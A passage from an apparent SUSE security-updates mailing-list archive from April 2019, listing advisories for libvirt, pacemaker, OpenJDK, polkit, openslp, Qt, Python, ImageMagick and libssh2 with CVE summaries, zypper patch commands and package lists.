      libvirt-3.3.0-5.30.1 libvirt-admin-3.3.0-5.30.1 libvirt-admin-debuginfo-3.3.0-5.30.1 libvirt-client-3.3.0-5.30.1 libvirt-client-debuginfo-3.3.0-5.30.1 libvirt-daemon-3.3.0-5.30.1 libvirt-daemon-config-network-3.3.0-5.30.1 libvirt-daemon-config-nwfilter-3.3.0-5.30.1 libvirt-daemon-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-interface-3.3.0-5.30.1 libvirt-daemon-driver-interface-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-lxc-3.3.0-5.30.1 libvirt-daemon-driver-lxc-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-network-3.3.0-5.30.1 libvirt-daemon-driver-network-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-qemu-3.3.0-5.30.1 libvirt-daemon-driver-qemu-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-secret-3.3.0-5.30.1 libvirt-daemon-driver-secret-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-3.3.0-5.30.1
      libvirt-daemon-driver-storage-logical-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-hooks-3.3.0-5.30.1 libvirt-daemon-lxc-3.3.0-5.30.1 libvirt-daemon-qemu-3.3.0-5.30.1 libvirt-debugsource-3.3.0-5.30.1 libvirt-doc-3.3.0-5.30.1 libvirt-libs-3.3.0-5.30.1 libvirt-libs-debuginfo-3.3.0-5.30.1 libvirt-lock-sanlock-3.3.0-5.30.1 libvirt-lock-sanlock-debuginfo-3.3.0-5.30.1 libvirt-nss-3.3.0-5.30.1 libvirt-nss-debuginfo-3.3.0-5.30.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 x86_64):
      libvirt-daemon-driver-storage-rbd-3.3.0-5.30.1 libvirt-daemon-driver-storage-rbd-debuginfo-3.3.0-5.30.1

   - SUSE Linux Enterprise Server 12-SP3 (x86_64):
      libvirt-daemon-driver-libxl-3.3.0-5.30.1 libvirt-daemon-driver-libxl-debuginfo-3.3.0-5.30.1 libvirt-daemon-xen-3.3.0-5.30.1

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):
      libvirt-3.3.0-5.30.1 libvirt-admin-3.3.0-5.30.1 libvirt-admin-debuginfo-3.3.0-5.30.1 libvirt-client-3.3.0-5.30.1 libvirt-client-debuginfo-3.3.0-5.30.1 libvirt-daemon-3.3.0-5.30.1 libvirt-daemon-config-network-3.3.0-5.30.1 libvirt-daemon-config-nwfilter-3.3.0-5.30.1 libvirt-daemon-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-interface-3.3.0-5.30.1 libvirt-daemon-driver-interface-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-libxl-3.3.0-5.30.1 libvirt-daemon-driver-libxl-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-lxc-3.3.0-5.30.1 libvirt-daemon-driver-lxc-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-network-3.3.0-5.30.1 libvirt-daemon-driver-network-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-qemu-3.3.0-5.30.1 libvirt-daemon-driver-qemu-debuginfo-3.3.0-5.30.1
      libvirt-daemon-driver-secret-3.3.0-5.30.1 libvirt-daemon-driver-secret-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-rbd-3.3.0-5.30.1 libvirt-daemon-driver-storage-rbd-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-lxc-3.3.0-5.30.1 libvirt-daemon-qemu-3.3.0-5.30.1 libvirt-daemon-xen-3.3.0-5.30.1 libvirt-debugsource-3.3.0-5.30.1 libvirt-doc-3.3.0-5.30.1 libvirt-libs-3.3.0-5.30.1 libvirt-libs-debuginfo-3.3.0-5.30.1

References:

   https://www.suse.com/security/cve/CVE-2019-3840.html
   https://www.suse.com/security/cve/CVE-2019-3886.html
   https://bugzilla.suse.com/1120813
   https://bugzilla.suse.com/1126325
   https://bugzilla.suse.com/1127458
   https://bugzilla.suse.com/1131595
   https://bugzilla.suse.com/1131955

From sle-security-updates at lists.suse.com Fri Apr 26 07:16:07 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 26 Apr 2019 15:16:07 +0200 (CEST)
Subject: SUSE-SU-2019:1047-1: important: Security update for pacemaker
Message-ID: <20190426131607.1A70FF3DB@maintenance.suse.de>

SUSE Security Update: Security update for pacemaker
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1047-1
Rating:             important
References:         #1117381 #1117934 #1128374 #1128772 #1131353 #1131356 #1131357
Cross-References:   CVE-2018-16877 CVE-2018-16878 CVE-2019-3885
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise High Availability 12-SP4
______________________________________________________________________________

   An update that solves three vulnerabilities and has four fixes is now available.

Description:

   This update for pacemaker fixes the following issues:

   Security issues fixed:

   - CVE-2019-3885: Fixed an information disclosure in log output (bsc#1131357).
   - CVE-2018-16877: Fixed a local privilege escalation through insufficient IPC
     client-server authentication (bsc#1131356).
   - CVE-2018-16878: Fixed a denial of service caused by insufficient verification,
     which could lead to uncontrolled processes being preferred (bsc#1131353).

   Non-security issue fixed:

   - scheduler: Respect the order of constraints when relevant resources are being
     probed (bsc#1117934, bsc#1128374).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP4:
      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1047=1
   - SUSE Linux Enterprise High Availability 12-SP4:
      zypper in -t patch SUSE-SLE-HA-12-SP4-2019-1047=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):
      libpacemaker-devel-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debugsource-1.1.19+20181105.ccd6b5b10-3.10.1

   - SUSE Linux Enterprise High Availability 12-SP4 (ppc64le s390x x86_64):
      libpacemaker3-1.1.19+20181105.ccd6b5b10-3.10.1 libpacemaker3-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cli-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cli-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debugsource-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-remote-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-remote-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1

References:

   https://www.suse.com/security/cve/CVE-2018-16877.html
   https://www.suse.com/security/cve/CVE-2018-16878.html
   https://www.suse.com/security/cve/CVE-2019-3885.html
   https://bugzilla.suse.com/1117381
   https://bugzilla.suse.com/1117934
   https://bugzilla.suse.com/1128374
   https://bugzilla.suse.com/1128772
   https://bugzilla.suse.com/1131353
   https://bugzilla.suse.com/1131356
   https://bugzilla.suse.com/1131357

From sle-security-updates at lists.suse.com Fri Apr 26 10:12:12 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 26 Apr 2019 18:12:12 +0200 (CEST)
Subject: SUSE-SU-2019:1052-1: moderate: Security update for java-11-openjdk
Message-ID:
<20190426161212.7FB46F3DB@maintenance.suse.de>

SUSE Security Update: Security update for java-11-openjdk
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1052-1
Rating:             moderate
References:         #1132728 #1132732
Cross-References:   CVE-2019-2602 CVE-2019-2684
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.

Description:

   This update for java-11-openjdk to version 11.0.3+7 fixes the following issues:

   Security issues fixed:

   - CVE-2019-2602: Fixed excessive use of CPU time in the BigDecimal
     implementation (bsc#1132728).
   - CVE-2019-2684: Fixed a flaw in the RMI registry implementation which could
     lead to selection of an incorrect skeleton class (bsc#1132732).

   Non-security issues fixed:

   - Multiple bug fixes and improvements.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:
      zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1052=1

Package List:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):
      java-11-openjdk-11.0.3.0-3.21.2 java-11-openjdk-accessibility-11.0.3.0-3.21.2 java-11-openjdk-accessibility-debuginfo-11.0.3.0-3.21.2 java-11-openjdk-debuginfo-11.0.3.0-3.21.2 java-11-openjdk-debugsource-11.0.3.0-3.21.2 java-11-openjdk-demo-11.0.3.0-3.21.2 java-11-openjdk-devel-11.0.3.0-3.21.2 java-11-openjdk-headless-11.0.3.0-3.21.2 java-11-openjdk-jmods-11.0.3.0-3.21.2 java-11-openjdk-src-11.0.3.0-3.21.2

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch):
      java-11-openjdk-javadoc-11.0.3.0-3.21.2

References:

   https://www.suse.com/security/cve/CVE-2019-2602.html
   https://www.suse.com/security/cve/CVE-2019-2684.html
   https://bugzilla.suse.com/1132728
   https://bugzilla.suse.com/1132732

From sle-security-updates at lists.suse.com Fri Apr 26 19:08:58 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 03:08:58 +0200 (CEST)
Subject: SUSE-SU-2019:0019-2: moderate: Security update for polkit
Message-ID: <20190427010858.C5BA2F3D3@maintenance.suse.de>

SUSE Security Update: Security update for polkit
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0019-2
Rating:             moderate
References:         #1118277
Cross-References:   CVE-2018-19788
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes one vulnerability is now available.
Description:

   This update for polkit fixes the following issues:

   Security issue fixed:

   - CVE-2018-19788: Fixed the handling of user IDs greater than INT_MAX, which
     allowed a user with such a UID to execute any systemctl command without
     proper authorization (bsc#1118277).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-19=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      libpolkit0-0.113-5.15.1 libpolkit0-debuginfo-0.113-5.15.1 polkit-0.113-5.15.1 polkit-debuginfo-0.113-5.15.1 polkit-debugsource-0.113-5.15.1 typelib-1_0-Polkit-1_0-0.113-5.15.1

References:

   https://www.suse.com/security/cve/CVE-2018-19788.html
   https://bugzilla.suse.com/1118277

From sle-security-updates at lists.suse.com Fri Apr 26 19:09:35 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 03:09:35 +0200 (CEST)
Subject: SUSE-SU-2018:2991-3: important: Security update for openslp
Message-ID: <20190427010935.1DAD6F3D3@maintenance.suse.de>

SUSE Security Update: Security update for openslp
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:2991-3
Rating:             important
References:         #1090638
Cross-References:   CVE-2017-17833
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes one vulnerability is now available.
Description:

   This update for openslp fixes the following issues:

   - CVE-2017-17833: Prevent a heap-related memory corruption issue which may have
     manifested itself as a denial-of-service or a remote code-execution
     vulnerability (bsc#1090638).
   - Prevent out-of-bounds reads in message parsing.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1057=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      openslp-2.0.0-18.17.1 openslp-32bit-2.0.0-18.17.1 openslp-debuginfo-2.0.0-18.17.1 openslp-debuginfo-32bit-2.0.0-18.17.1 openslp-debugsource-2.0.0-18.17.1 openslp-server-2.0.0-18.17.1 openslp-server-debuginfo-2.0.0-18.17.1

References:

   https://www.suse.com/security/cve/CVE-2017-17833.html
   https://bugzilla.suse.com/1090638

From sle-security-updates at lists.suse.com Fri Apr 26 19:10:08 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 03:10:08 +0200 (CEST)
Subject: SUSE-SU-2018:4210-2: moderate: Security update for libqt5-qtbase
Message-ID: <20190427011008.A453AF3D3@maintenance.suse.de>

SUSE Security Update: Security update for libqt5-qtbase
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:4210-2
Rating:             moderate
References:         #1118595 #1118596
Cross-References:   CVE-2018-15518 CVE-2018-19873
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.
Description:

   This update for libqt5-qtbase fixes the following issues:

   Security issues fixed:

   - CVE-2018-15518: Fixed a double free in QXmlStreamReader (bsc#1118595).
   - CVE-2018-19873: Fixed a denial of service on a malformed BMP file in
     QBmpHandler (bsc#1118596).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1056=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      libQt5Core5-5.5.1-8.3.1 libQt5Core5-debuginfo-5.5.1-8.3.1 libQt5DBus5-5.5.1-8.3.1 libQt5DBus5-debuginfo-5.5.1-8.3.1 libQt5Gui5-5.5.1-8.3.1 libQt5Gui5-debuginfo-5.5.1-8.3.1 libQt5Network5-5.5.1-8.3.1 libQt5Network5-debuginfo-5.5.1-8.3.1 libQt5Widgets5-5.5.1-8.3.1 libQt5Widgets5-debuginfo-5.5.1-8.3.1 libqt5-qtbase-debugsource-5.5.1-8.3.1

References:

   https://www.suse.com/security/cve/CVE-2018-15518.html
   https://www.suse.com/security/cve/CVE-2018-19873.html
   https://bugzilla.suse.com/1118595
   https://bugzilla.suse.com/1118596

From sle-security-updates at lists.suse.com Fri Apr 26 19:10:49 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 03:10:49 +0200 (CEST)
Subject: SUSE-SU-2019:0482-2: important: Security update for python
Message-ID: <20190427011049.27F79F3D3@maintenance.suse.de>

SUSE Security Update: Security update for python
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0482-2
Rating:             important
References:         #1073748 #1109847 #1122191
Cross-References:   CVE-2018-14647 CVE-2019-5010
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves two vulnerabilities and has one errata is now available.
Description:

   This update for python fixes the following issues:

   Security issues fixed:

   - CVE-2019-5010: Fixed a denial-of-service vulnerability in the X509 certificate
     parser (bsc#1122191).
   - CVE-2018-14647: Fixed a denial-of-service vulnerability in Expat (bsc#1109847).

   Non-security issue fixed:

   - Fixed a bug where the PyWeakReference struct was not initialized correctly,
     leading to a crash (bsc#1073748).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-482=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      libpython2_7-1_0-2.7.13-28.21.1 libpython2_7-1_0-32bit-2.7.13-28.21.1 libpython2_7-1_0-debuginfo-2.7.13-28.21.1 libpython2_7-1_0-debuginfo-32bit-2.7.13-28.21.1 python-2.7.13-28.21.1 python-32bit-2.7.13-28.21.1 python-base-2.7.13-28.21.1 python-base-32bit-2.7.13-28.21.1 python-base-debuginfo-2.7.13-28.21.1 python-base-debuginfo-32bit-2.7.13-28.21.1 python-base-debugsource-2.7.13-28.21.1 python-curses-2.7.13-28.21.1 python-curses-debuginfo-2.7.13-28.21.1 python-debuginfo-2.7.13-28.21.1 python-debuginfo-32bit-2.7.13-28.21.1 python-debugsource-2.7.13-28.21.1 python-demo-2.7.13-28.21.1 python-devel-2.7.13-28.21.1 python-gdbm-2.7.13-28.21.1 python-gdbm-debuginfo-2.7.13-28.21.1 python-idle-2.7.13-28.21.1 python-tk-2.7.13-28.21.1 python-tk-debuginfo-2.7.13-28.21.1 python-xml-2.7.13-28.21.1 python-xml-debuginfo-2.7.13-28.21.1

   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):
      python-doc-2.7.13-28.21.1 python-doc-pdf-2.7.13-28.21.1

References:

   https://www.suse.com/security/cve/CVE-2018-14647.html
   https://www.suse.com/security/cve/CVE-2019-5010.html
   https://bugzilla.suse.com/1073748
   https://bugzilla.suse.com/1109847
   https://bugzilla.suse.com/1122191

From sle-security-updates at lists.suse.com Fri Apr 26 19:11:44 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 03:11:44 +0200 (CEST)
Subject: SUSE-SU-2019:1033-2: moderate: Security update for ImageMagick
Message-ID: <20190427011144.EFA04F3D3@maintenance.suse.de>

SUSE Security Update: Security update for ImageMagick
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1033-2
Rating:             moderate
References:         #1106989 #1106996 #1107609 #1120381 #1122033 #1124365 #1124366
                    #1124368 #1128649 #1130330 #1131317 #1132053 #1132054 #1132060
Cross-References:   CVE-2018-16412 CVE-2018-16413 CVE-2018-16644 CVE-2018-20467
                    CVE-2019-10650 CVE-2019-11007 CVE-2019-11008 CVE-2019-11009
                    CVE-2019-7175 CVE-2019-7395 CVE-2019-7397 CVE-2019-7398
                    CVE-2019-9956
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves 13 vulnerabilities and has one errata is now available.

Description:

   This update for ImageMagick fixes the following issues:

   Security issues fixed:

   - CVE-2019-9956: Fixed a stack-based buffer overflow in PopHexPixel() (bsc#1130330).
   - CVE-2019-10650: Fixed a heap-based buffer over-read in WriteTIFFImage() (bsc#1131317).
   - CVE-2019-7175: Fixed multiple memory leaks in the DecodeImage function (bsc#1128649).
   - CVE-2018-20467: Fixed an infinite loop in coders/bmp.c (bsc#1120381).
   - CVE-2019-7398: Fixed a memory leak in the function WriteDIBImage (bsc#1124365).
   - CVE-2019-7397: Fixed a memory leak in the function WritePDFImage (bsc#1124366).
   - CVE-2019-7395: Fixed a memory leak in the function WritePSDChannel (bsc#1124368).
   - CVE-2018-16413: Fixed a heap-based buffer over-read in PushShortPixel() (bsc#1106989).
   - CVE-2018-16412: Fixed a heap-based buffer over-read in ParseImageResourceBlocks() (bsc#1106996).
   - CVE-2018-16644: Fixed a regression in the dcm coder (bsc#1107609).
   - CVE-2019-11007: Fixed a heap-based buffer overflow in ReadMNGImage() (bsc#1132060).
   - CVE-2019-11008: Fixed a heap-based buffer overflow in WriteXWDImage() (bsc#1132054).
   - CVE-2019-11009: Fixed a heap-based buffer over-read in ReadXWDImage() (bsc#1132053).

   - Added extra -config- packages with the Postscript/EPS/PDF readers still
     enabled. Removing the PS decoders hardens ImageMagick against security issues
     within ghostscript; enabling them might impact security (bsc#1122033).
     Two configuration packages can be selected:

     - ImageMagick-config-6-SUSE: PS decoders disabled.
     - ImageMagick-config-6-upstream: PS decoders enabled.

     Depending on your local needs, install either one of them. The default is
     the -SUSE configuration.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1033=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

References:

   https://www.suse.com/security/cve/CVE-2018-16412.html
   https://www.suse.com/security/cve/CVE-2018-16413.html
   https://www.suse.com/security/cve/CVE-2018-16644.html
   https://www.suse.com/security/cve/CVE-2018-20467.html
   https://www.suse.com/security/cve/CVE-2019-10650.html
   https://www.suse.com/security/cve/CVE-2019-11007.html
   https://www.suse.com/security/cve/CVE-2019-11008.html
   https://www.suse.com/security/cve/CVE-2019-11009.html
   https://www.suse.com/security/cve/CVE-2019-7175.html
   https://www.suse.com/security/cve/CVE-2019-7395.html
   https://www.suse.com/security/cve/CVE-2019-7397.html
   https://www.suse.com/security/cve/CVE-2019-7398.html
   https://www.suse.com/security/cve/CVE-2019-9956.html
   https://bugzilla.suse.com/1106989
   https://bugzilla.suse.com/1106996
   https://bugzilla.suse.com/1107609
   https://bugzilla.suse.com/1120381
   https://bugzilla.suse.com/1122033
   https://bugzilla.suse.com/1124365
   https://bugzilla.suse.com/1124366
   https://bugzilla.suse.com/1124368
   https://bugzilla.suse.com/1128649
   https://bugzilla.suse.com/1130330
   https://bugzilla.suse.com/1131317
   https://bugzilla.suse.com/1132053
   https://bugzilla.suse.com/1132054
   https://bugzilla.suse.com/1132060

From sle-security-updates at lists.suse.com Sat Apr 27 07:09:10 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 15:09:10 +0200 (CEST)
Subject: SUSE-SU-2019:14032-1: important: Security update for libssh2_org
Message-ID: <20190427130910.246B3F3D3@maintenance.suse.de>

SUSE Security Update: Security update for libssh2_org
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14032-1
Rating:             important
References:         #1130103 #1133528
Cross-References:   CVE-2019-3859
Affected Products:
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

   An update that solves one vulnerability and has one errata is now available.

Description:

   This update for libssh2_org fixes the following issues:

   - The incorrect upstream fix for CVE-2019-3859 broke public key authentication
     [bsc#1133528, bsc#1130103].

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Point of Sale 11-SP3:

      zypper in -t patch sleposp3-libssh2_org-14032=1

   - SUSE Linux Enterprise Debuginfo 11-SP3:

      zypper in -t patch dbgsp3-libssh2_org-14032=1

Package List:

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

      libssh2-1-1.2.9-4.2.12.8.1

   - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):

      libssh2_org-debuginfo-1.2.9-4.2.12.8.1
      libssh2_org-debugsource-1.2.9-4.2.12.8.1

References:

   https://www.suse.com/security/cve/CVE-2019-3859.html
   https://bugzilla.suse.com/1130103
   https://bugzilla.suse.com/1133528

From sle-security-updates at lists.suse.com Sat Apr 27 07:09:59 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 15:09:59 +0200 (CEST)
Subject: SUSE-SU-2019:1060-1: important: Security update for libssh2_org
Message-ID: <20190427130959.77483F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for libssh2_org
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1060-1
Rating:             important
References:         #1130103 #1133528
Cross-References:   CVE-2019-3859
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
                    SUSE CaaS Platform ALL
                    SUSE CaaS Platform 3.0
                    OpenStack Cloud Magnum Orchestration 7
______________________________________________________________________________

   An update that solves one vulnerability and has one errata is now available.

Description:

   This update for libssh2_org fixes the following issues:

   - Incorrect upstream fix for CVE-2019-3859 broke public key authentication
     [bsc#1133528, bsc#1130103]

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE OpenStack Cloud 7:

      zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1060=1

   - SUSE Linux Enterprise Software Development Kit 12-SP4:

      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1060=1

   - SUSE Linux Enterprise Software Development Kit 12-SP3:

      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1060=1

   - SUSE Linux Enterprise Server for SAP 12-SP2:

      zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1060=1

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1060=1

   - SUSE Linux Enterprise Server 12-SP4:

      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1060=1

   - SUSE Linux Enterprise Server 12-SP3:

      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1060=1

   - SUSE Linux Enterprise Server 12-SP2-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1060=1

   - SUSE Linux Enterprise Server 12-SP2-BCL:

      zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1060=1

   - SUSE Linux Enterprise Server 12-SP1-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1060=1

   - SUSE Linux Enterprise Server 12-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-2019-1060=1

   - SUSE Linux Enterprise Desktop 12-SP4:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1060=1

   - SUSE Linux Enterprise Desktop 12-SP3:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1060=1

   - SUSE Enterprise Storage 4:

      zypper in -t patch SUSE-Storage-4-2019-1060=1

   - SUSE CaaS Platform ALL:

      To install this update, use the SUSE CaaS Platform Velum dashboard.
      It will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.
   - SUSE CaaS Platform 3.0:

      To install this update, use the SUSE CaaS Platform Velum dashboard.
      It will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.

